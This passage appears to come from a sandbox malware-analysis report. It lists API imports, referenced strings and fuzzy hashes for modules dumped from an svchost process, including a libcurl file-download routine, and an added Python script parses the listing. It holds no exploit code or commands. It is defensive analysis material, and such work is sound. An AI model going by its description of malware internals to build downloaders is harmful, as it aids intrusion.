            • Instruction ID: 47771d90c868ec4dc4df9a16ed7766f050a57d903592d0e8c9a412a42eccd3e3
            • Opcode Fuzzy Hash: e6c7ad1d9f60df151eb7dc10e28354505227c09a40da8267f4cf20ae9a8186ff
            • Instruction Fuzzy Hash: 7571F3F174220E55EE898726B8103392253AB45F99FC88639CD3E5A7D4EF3DC49AC310
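The function blocks on this page (memory-dump source, Similarity fields, opcode and instruction fuzzy hashes) are easier to cross-reference once parsed into records: which dumped module a function belongs to, what it imports, and which strings it references. The Python below is an added example for this report, not Joe Sandbox code, that parses this block format. Its sample input is excerpted from the two blocks above (the libcurl download routine in the module based at 00007FFA417C0000 and the setlocale routine in the module based at 68280000). Two interpretations are assumptions, not documented by the report: that the first dotted field of a *.sdmp name is the process id in hex (0000002E, matching the 46 in hcaresult_46_2_...), and that the fifth field is a winnt.h page protection (0x20 on the code dump, 0x02/0x04/0x08 on the data dumps).

```python
"""Parse a Joe Sandbox function-similarity listing (this page's block format)
into records so fuzzy hashes, imports and strings can be cross-referenced.
Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# winnt.h page protections. Reading the fifth dotted *.sdmp field as the page
# protection is an inference from this listing, not documented behaviour.
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x08: "PAGE_WRITECOPY", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE"}

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")  # "• Key: value" bullet lines


@dataclass
class FunctionRecord:
    source_dump: str = ""
    module_base: int = 0
    snapshot: str = ""
    api_id: str = ""
    string_id: str = ""
    opcode_fuzzy_hash: str = ""
    instruction_fuzzy_hash: str = ""
    strings: list = field(default_factory=list)

    @property
    def process_id(self) -> int:
        # Assumption: first dotted field of the dump name is the pid in hex (0000002E -> 46).
        return int(self.source_dump.split(".")[0], 16)

    @property
    def protection(self) -> str:
        return PAGE_PROTECTION.get(int(self.source_dump.split(".")[4], 16), "UNKNOWN")

    def consistent(self) -> bool:
        # Snapshot name "hcaresult_<pid>_<stage>_<base>_<image>.jbxd" must agree
        # with the dump name: same decimal pid and same module base.
        parts = self.snapshot.split("_")
        return int(parts[1]) == self.process_id and int(parts[3], 16) == self.module_base


def parse_listing(text: str) -> list:
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = FIELD_RE.match(line)
        if not m or line.startswith("• Part of subcall"):
            continue  # headings ("Similarity", "APIs") and sub-call notes carry no fields
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":  # "<dump>.sdmp, Offset: <base>, based on PE: true"
            name, rest = value.split(",", 1)
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rest)
            cur = FunctionRecord(source_dump=name.strip(),
                                 module_base=int(off.group(1), 16) if off else 0)
        elif key == "Snapshot File":
            cur.snapshot = value
        elif key == "API ID":
            cur.api_id = value
        elif key == "String ID":  # referenced strings are '$'-separated in the report
            cur.string_id = value
            cur.strings = [s for s in value.split("$") if s]
        elif key == "Opcode Fuzzy Hash":
            cur.opcode_fuzzy_hash = value
        elif key == "Instruction Fuzzy Hash":  # last field of every block
            cur.instruction_fuzzy_hash = value
            records.append(cur)
            cur = FunctionRecord()
    return records


def find_by_string(records, needle: str) -> list:
    """Functions whose referenced strings contain `needle` (e.g. an error message)."""
    return [r for r in records if any(needle in s for s in r.strings)]


# Two blocks excerpted from the listing on this page (link residue removed).
SAMPLE = """
Memory Dump Source
• Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
• Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
Similarity
• API ID: curl_easy_setopt$curl_easy_cleanupcurl_easy_initcurl_easy_performcurl_easy_strerror
• String ID: Content type is not downloadable or response code is not OK$Failed to Initialize cURL$File could not be created.$application/octet-stream$text/plain; charset=utf-8
• API String ID: 2825223466-4018419100
• Opcode Fuzzy Hash: d85913f9b69b27529117e5d785c89d233f765071da7242c062c0a4f409c0731e
• Instruction Fuzzy Hash: 0DE14D22A1CB8185EB13EB35D5806BD37B0FB86B88F558235DE0E57A66EF38E145C740
Memory Dump Source
• Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
Similarity
• API ID: setlocale$free$_strdupstrchr$strcmp
• String ID: LC_COLLATE$LC_CTYPE$LC_MESSAGES$LC_MONETARY$LC_NUMERIC$LC_TIME$LC_XXX
• Opcode Fuzzy Hash: e6c7ad1d9f60df151eb7dc10e28354505227c09a40da8267f4cf20ae9a8186ff
• Instruction Fuzzy Hash: 7571F3F174220E55EE898726B8103392253AB45F99FC88639CD3E5A7D4EF3DC49AC310
"""
```

Running `parse_listing(SAMPLE)` yields two records that both pass `consistent()`, both decode to process id 46 with PAGE_EXECUTE_READ code dumps, and `find_by_string(records, "cURL")` isolates the download routine; the same parser applied to the full page lets you group every fuzzy hash by module base and pull the strings of each function without reading the blocks one at a time.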
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
            • String ID:
            • API String ID: 2398595512-0
            • Opcode ID: 8e69e2400c678896474a71e5a9b84d5d55e522ced736dbd8aeb9ea0d45dac52e
            • Instruction ID: ee35db549e31f25ecad757914f788a1c377ce6bf48891497318272318c73b863
            • Opcode Fuzzy Hash: 8e69e2400c678896474a71e5a9b84d5d55e522ced736dbd8aeb9ea0d45dac52e
            • Instruction Fuzzy Hash: 2A916131B1CA4246EB67AF25A84467A2690EF477B8F548334D9AE47AF5DF3CF4058700
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
            • String ID: parse_error$value
            • API String ID: 1944019136-1739288027
            • Opcode ID: f0f8ab8c36cb6c1bb4624754cf3233d71eef0d88a99854f693065c0915c1428f
            • Instruction ID: fc9bfeed26b08510428575f5905fe4945ab47f7b20069c34a188b4d005b8d221
            • Opcode Fuzzy Hash: f0f8ab8c36cb6c1bb4624754cf3233d71eef0d88a99854f693065c0915c1428f
            • Instruction Fuzzy Hash: EEE1E662F1CA4295EB13EB74D4802EE6371EB56398F408231EA4D47AE7EF6CE144C744
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: strlen$malloc
            • String ID:
            • API String ID: 3157260142-0
            • Opcode ID: bab9e201f35533498d5ffe7c62f90dbf08eda0b4ce6cb153236da57cbd266d92
            • Instruction ID: 0534087b0e701903961d93f7aa28f9b970e5e5cf5cb79d7fc815b1099d6b10dc
            • Opcode Fuzzy Hash: bab9e201f35533498d5ffe7c62f90dbf08eda0b4ce6cb153236da57cbd266d92
            • Instruction Fuzzy Hash: 67E180B7719AC982DF24CB19E45835EB6A1F785B88F848525CEE957B88DF3DC049C700
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy
            • String ID: invalid_iterator
            • API String ID: 3630682930-2508626007
            • Opcode ID: 397537d3d4378fa5c54376e807f2bd53a57192dd083d56d661d1957e75eec541
            • Instruction ID: ef0b07f788514b3fe59546b87ff885bfdcc7a0bd32911a570840c73880e96ff3
            • Opcode Fuzzy Hash: 397537d3d4378fa5c54376e807f2bd53a57192dd083d56d661d1957e75eec541
            • Instruction Fuzzy Hash: 8BA1B222F1CB4585EB12EF65D4402AD6371EB4A7A4F508331EA6D13BE6EF7CE0958740
            APIs
              • Part of subcall function 6828C220: strchr.MSVCRT ref: 6828C257
              • Part of subcall function 6828C220: setlocale.MSVCRT ref: 6828C269
              • Part of subcall function 6828C220: _strdup.MSVCRT(?,?,?,?,?,?,68287D85), ref: 6828C27A
              • Part of subcall function 6828C220: setlocale.MSVCRT ref: 6828C2AC
              • Part of subcall function 6828C220: free.MSVCRT(?,?,?,?,?,?,68287D85), ref: 6828C2CE
            • strchr.MSVCRT ref: 68287D90
            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 68287DB0
            • strcmp.MSVCRT ref: 68287DD2
            • strncpy.MSVCRT ref: 68287DEF
            • EnumSystemLocalesA.KERNEL32 ref: 68287E11
            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 68287E28
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: setlocalestrchr$EnumLocalesSystem_strdupfreepthread_mutex_lockpthread_mutex_unlockstrcmpstrncpy
            • String ID:
            • API String ID: 3715319363-0
            • Opcode ID: c6a594b9fceb763ea04cda396f9cafc38307eee5609c706cb0d3b083be9dfe11
            • Instruction ID: 30c4b0ccd22984e49effa0c280e7d9621567dd064359c0b416f4409a9f50fb22
            • Opcode Fuzzy Hash: c6a594b9fceb763ea04cda396f9cafc38307eee5609c706cb0d3b083be9dfe11
            • Instruction Fuzzy Hash: DC217FB871110BC6FF04DB67ECA477523A3BB45795FC48626C52A872E0EF69C8A88340
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
            • String ID: N/A$\s+
            • API String ID: 469901203-4167641992
            • Opcode ID: f4ed509622e860bc7b27e11ca4ab0ea1aeb907b098a98f9e442142f0a9928c68
            • Instruction ID: 5a6173d38d0134d2896cd2a85492da74657630819ae2b9751a34b73b20feaa24
            • Opcode Fuzzy Hash: f4ed509622e860bc7b27e11ca4ab0ea1aeb907b098a98f9e442142f0a9928c68
            • Instruction Fuzzy Hash: 3312B862A1CBC581EB62DB25E0407AE73A1FB96794F50C335DA9D07AA6DF7CD084CB04
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: ' to $Could not convert '$ing.$int
            • API String ID: 3668304517-2504206643
            • Opcode ID: dc925798f7f00755786379c880ab5f5a82b9b17f0e230689b8608f3ec79b1bf8
            • Instruction ID: 936f7e2d8eabcbdd8cec558605683e92ffa6d053d1f4ffb485a72283821a2893
            • Opcode Fuzzy Hash: dc925798f7f00755786379c880ab5f5a82b9b17f0e230689b8608f3ec79b1bf8
            • Instruction Fuzzy Hash: AFF1B062E1CB8581EB13EB35D4403BD6761FB96788F609231EA8D166A6EF7CF580C700
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID: AreFileApisANSI$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
            • API String ID: 544645111-4046831456
            • Opcode ID: 374e437e81fee72c3d3a65cb7cf26b3976edcab2d670eda947539221e9f9a687
            • Instruction ID: b4bf00ec15f1368c19339afc93ba0319d740c424607d364ab259f1e8f1675494
            • Opcode Fuzzy Hash: 374e437e81fee72c3d3a65cb7cf26b3976edcab2d670eda947539221e9f9a687
            • Instruction Fuzzy Hash: 544185B1E0D60B90EB07BB55E9816E523A1AF5374AB88C436E41C17272DFBCB54AC341
            APIs
            • RtlCaptureContext.KERNEL32 ref: 6828C954
            • RtlLookupFunctionEntry.KERNEL32 ref: 6828C96B
            • RtlVirtualUnwind.KERNEL32 ref: 6828C9AD
            • SetUnhandledExceptionFilter.KERNEL32 ref: 6828C9F4
            • UnhandledExceptionFilter.KERNEL32 ref: 6828CA01
            • GetCurrentProcess.KERNEL32 ref: 6828CA07
            • TerminateProcess.KERNEL32 ref: 6828CA15
            • abort.MSVCRT ref: 6828CA1B
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
            • String ID:
            • API String ID: 4278921479-0
            • Opcode ID: a62c5bb7412ab743e846d4a6747dc65f387974b4e5a27c3ec64f4ee464831e3e
            • Instruction ID: 907bef7b485367586e7d5af050a26f2140c0965c287e774aed3a681ef61c9931
            • Opcode Fuzzy Hash: a62c5bb7412ab743e846d4a6747dc65f387974b4e5a27c3ec64f4ee464831e3e
            • Instruction Fuzzy Hash: D2213C79611B02D9FF048B56F86439937A6BB08BA9F408226D94E13774EF7AC1A4C350
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
            • String ID: utf8
            • API String ID: 2487361160-905460609
            • Opcode ID: 0bfd6d178af608991e928dc1cf37b5cf8dec26144d8911be4b9e0768a28aa328
            • Instruction ID: 5440fcfe43f5c78c8882c78a887650b1d09af6e50b65af9f8927f336f6c436d7
            • Opcode Fuzzy Hash: 0bfd6d178af608991e928dc1cf37b5cf8dec26144d8911be4b9e0768a28aa328
            • Instruction Fuzzy Hash: 1591BD36A0C7828AEB27BB61D4416BA63A4EF46B88F48C135DE5D477A6DF3CF5458300
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUserValue
            • String ID:
            • API String ID: 3482755877-0
            • Opcode ID: a4c5ae8edbfc5d69139923b3327011827f63cc8e8f4e6e3f78cc7af386c023b5
            • Instruction ID: 6f440a3c30c155a1c7d47b5ee629c645994f056f731054f2695923d5f3d7ac4e
            • Opcode Fuzzy Hash: a4c5ae8edbfc5d69139923b3327011827f63cc8e8f4e6e3f78cc7af386c023b5
            • Instruction Fuzzy Hash: 6C714762B1C64299EB23BB61D8506B823A2FF46B88F448135CA1D576A5EF3CF846C350
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
            • String ID:
            • API String ID: 1239891234-0
            • Opcode ID: 04ee7bf9e3160090bd68060af936c8d3b213bfb7043eed21d055299f2e1ce715
            • Instruction ID: 57dd26c9f1e807915f7b4106ded5874cc7c6817b7d7903b68174a74a56d271da
            • Opcode Fuzzy Hash: 04ee7bf9e3160090bd68060af936c8d3b213bfb7043eed21d055299f2e1ce715
            • Instruction Fuzzy Hash: 93414F3261CB8186E762DF25E8403AE73B0FB897A8F544235EA8D46BA5DF3CD1558B00
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID: ACP$OCP
            • API String ID: 2299586839-711371036
            • Opcode ID: 906ed29bd771f1fae28e7a9f14592884e8a8dbfebb1811ddeacdff81d7186a5a
            • Instruction ID: f3af8c95e8fa02d088e9d36fd74659bb8e874163d0b48989a4b2f7ab2f93394f
            • Opcode Fuzzy Hash: 906ed29bd771f1fae28e7a9f14592884e8a8dbfebb1811ddeacdff81d7186a5a
            • Instruction Fuzzy Hash: 0F114F21A1C6439BFB97FF52A54067A63A0FF46784F10D431EA4E876A5EF2CF8418740
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 774aab6c5d84e6d95e48762101311a9cb8771486167b2139511246f904e85845
            • Instruction ID: 2d0a9b0121a13b8ec50d1da0d96c8add7669c2f57150d63e7a28f4f36ecfe42b
            • Opcode Fuzzy Hash: 774aab6c5d84e6d95e48762101311a9cb8771486167b2139511246f904e85845
            • Instruction Fuzzy Hash: DBA1B822B1C78586EB23AB26A40036AA351FB567D4F548235EEAD07BE6DF7CF441C700
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: InfoLocale$strncmpstrtoul
            • API String ID: 2149573502-0
            • Opcode ID: 474acadfda03ee1b901add7048b340572f97cfaef7de19b123f6c24da647dde7
            • Instruction ID: 2794244527accb634c04e781932744af81369bf3b8d7d80f3fe85dafbe55b027
            • Opcode Fuzzy Hash: 474acadfda03ee1b901add7048b340572f97cfaef7de19b123f6c24da647dde7
            • Instruction Fuzzy Hash: C921F9B332058582EF048B25ED457AA6393EB44BD5FC88135CAA9C769CEA6DC59D8300
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
